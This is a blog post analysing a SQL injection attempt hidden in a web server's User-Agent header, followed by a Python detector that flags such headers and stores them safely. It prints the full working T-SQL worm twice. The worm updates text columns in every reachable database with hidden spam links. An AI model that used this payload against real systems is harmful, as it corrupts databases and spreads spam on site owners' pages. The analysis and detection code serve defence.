masalib's diary

A blog about system development, operations, and cat photos

A seriously scary USER_AGENT

My log aggregation tool reported a byte-count error on USER_AGENT, so I checked, and it was a cracking attempt.
Good thing I had validation (input checking) in place.

The UA is below

Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0);declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select NAME from sys.databases where (has_dbaccess(NAME)!=0) and NAME not in ('master','tempdb','model','msdb',DB_NAME());open @b;fetch next from @b into @w;while @@FETCH_STATUS=0 begin set @s='begin try use '+@w+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%10 when 0 then ''''<div style="display:none">abortion pill <a href="http://www.1world2go.com/page/Coupons-Discounts" rel="nofollow">''''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''''abortion pill'''' when 1 then ''''abortion pill'''' else ''''abortion pill'''' end +''''</a> abortion pill</div>'''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b--

!! Absolutely do not copy-paste and run this !! I take no responsibility !! Since it is scary, some characters have been converted to full-width.

Formatted version

Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0);
declare @b cursor;
declare @s varchar(8000);
declare @w varchar(99);
set @b=cursor for
    select DB_NAME()
    union
    select NAME from sys.databases
    where (has_dbaccess(NAME)!=0)
      and NAME not in ('master','tempdb','model','msdb',DB_NAME());
open @b;
fetch next from @b into @w;
while @@FETCH_STATUS=0
begin
    set @s='begin try use '+@w+';
        declare @c cursor;
        declare @d varchar(4000);
        set @c=cursor for
            select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%10 when 0 then ''''<div style="display:none">abortion pill <a href="http://www.1world2go.com/page/Coupons-Discounts" rel="nofollow">''''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''''abortion pill'''' when 1 then ''''abortion pill'''' else ''''abortion pill'''' end +''''</a> abortion pill</div>'''' else '''''''' end''
            FROM sysindexes AS i
            INNER JOIN sysobjects AS o ON i.id=o.id
            INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME
            WHERE (indid in (0,1))
              and DATA_TYPE like ''%varchar''
              and (CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));
        open @c;
        fetch next from @c into @d;
        while @@FETCH_STATUS=0
        begin
            exec (@d);
            fetch next from @c into @d;
        end;
        close @c
    end try
    begin catch
    end catch';
    exec (@s);
    fetch next from @b into @w;
end;
close @b--

I always check the input parameters (POST, GET), but hiding it in the USER_AGENT of all places... hackers really do come up with amazing ideas.
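The check that the author's log tool stumbled into by accident can be done on purpose. What follows is an added example for this post, not the author's code: it parses access-log lines (assumed here to be in Apache combined format), flags User-Agent values that look like the payload above, and writes them to a log table through a parameterized query so the text is only ever treated as data. For reference, this is what the formatted payload does once a SQL Server application concatenates the UA into a query: it opens a cursor over every database the login can reach (sys.databases minus the system ones), builds an UPDATE for every varchar(max)/nvarchar(max) column of every table, appends a hidden spam div to roughly one row in ten (ABS(CHECKSUM(NewId()))%10 = 0), swallows every error inside try/catch, and ends with -- so whatever followed the UA in the original query is commented out. The log lines, client IPs, timestamps and the 512-byte limit are constructed for this example; PAYLOAD_UA is the string quoted above.

```python
"""Flag injected-SQL User-Agent values in access logs and store them safely.

Added example for this post, not the author's code. The log lines, client IPs,
timestamps and MAX_UA_BYTES are constructed; PAYLOAD_UA is the string quoted
in the post, handled here only as opaque text."""
from __future__ import annotations

import re
import sqlite3

PAYLOAD_UA = r"""Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0);declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select NAME from sys.databases where (has_dbaccess(NAME)!=0) and NAME not in ('master','tempdb','model','msdb',DB_NAME());open @b;fetch next from @b into @w;while @@FETCH_STATUS=0 begin set @s='begin try use '+@w+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%10 when 0 then ''''<div style="display:none">abortion pill <a href="http://www.1world2go.com/page/Coupons-Discounts" rel="nofollow">''''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''''abortion pill'''' when 1 then ''''abortion pill'''' else ''''abortion pill'''' end +''''</a> abortion pill</div>'''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b--"""

# Assumed cut-off; genuine browser UAs are a few hundred bytes at most, which is
# presumably why the author's log tool tripped on the byte count first.
MAX_UA_BYTES = 512

# T-SQL fragments that never appear in a genuine browser User-Agent.
TSQL_MARKERS = ("declare @", "cursor for", "fetch next", "sys.databases",
                "sysobjects", "information_schema", "exec (", "exec(")
SQL_VERB_AFTER_SEMICOLON = re.compile(r";\s*(declare|exec|update|select|insert|drop)\b")


def inspect_user_agent(ua: str) -> list[str]:
    """Return the reasons a UA looks like injected SQL; an empty list means clean."""
    reasons = []
    nbytes = len(ua.encode("utf-8"))
    if nbytes > MAX_UA_BYTES:
        reasons.append(f"length {nbytes} bytes exceeds {MAX_UA_BYTES}")
    if ua.count(")") > ua.count("("):
        reasons.append("more ')' than '(': breaks out of the enclosing expression")
    low = ua.lower()
    hits = [m for m in TSQL_MARKERS if m in low]
    if hits:
        reasons.append("T-SQL markers: " + ", ".join(hits))
    if SQL_VERB_AFTER_SEMICOLON.search(low):
        reasons.append("statement terminator followed by an SQL verb")
    if low.rstrip().endswith("--"):
        reasons.append("trailing '--' comments out the rest of the query")
    return reasons


# Apache combined log format; the UA is the last quoted field. Apache writes
# embedded quotes as \" so the greedy .* still stops at the closing quote.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>.*)"$')


def parse_combined(line: str) -> dict[str, str] | None:
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["ua"] = rec["ua"].replace('\\"', '"')  # undo Apache's quote escaping
    return rec


def scan_log(lines: list[str]) -> list[tuple[str, list[str]]]:
    """(client ip, reasons) for every line whose User-Agent looks injected."""
    flagged = []
    for line in lines:
        rec = parse_combined(line)
        if rec is not None:
            reasons = inspect_user_agent(rec["ua"])
            if reasons:
                flagged.append((rec["ip"], reasons))
    return flagged


def store_user_agents(uas: list[str]) -> list[str]:
    """Log UAs with a parameterized INSERT: the payload is stored verbatim as
    data and never reaches the SQL parser. The worm relies on the application
    concatenating the UA into a query string instead."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE access_log (id INTEGER PRIMARY KEY, ua TEXT NOT NULL)")
    con.executemany("INSERT INTO access_log (ua) VALUES (?)", [(u,) for u in uas])
    rows = [r[0] for r in con.execute("SELECT ua FROM access_log ORDER BY id")]
    con.close()
    return rows


# Constructed sample log: two ordinary browsers and one hit carrying the payload.
SAMPLE_LOG = [
    '203.0.113.7 - - [11/Nov/2013:10:12:01 +0900] "GET / HTTP/1.1" 200 5123 "-" '
    '"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0"',
    '198.51.100.9 - - [11/Nov/2013:10:12:03 +0900] "GET /cat.jpg HTTP/1.1" 200 90211 "-" '
    '"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9) AppleWebKit/537.71 (KHTML, like Gecko) '
    'Version/7.0 Safari/537.71"',
    '192.0.2.44 - - [11/Nov/2013:10:12:05 +0900] "GET /page.aspx?id=3 HTTP/1.1" 200 4410 "-" '
    '"' + PAYLOAD_UA.replace('"', '\\"') + '"',
]

if __name__ == "__main__":
    for ip, reasons in scan_log(SAMPLE_LOG):
        print(ip, *("  - " + r for r in reasons), sep="\n")
    stored = store_user_agents([parse_combined(l)["ua"] for l in SAMPLE_LOG])
    print("payload stored verbatim:", stored[-1] == PAYLOAD_UA)
```

Run stand-alone it prints the one flagged client with all five reasons; the byte-length check alone is enough to catch this particular worm, which is exactly what happened to the author, and the other checks are there for shorter payloads. The detection side only tells you someone tried; store_user_agents shows the application-side fix, since a header is user input just like a POST or GET parameter and must go through a bound parameter rather than string concatenation.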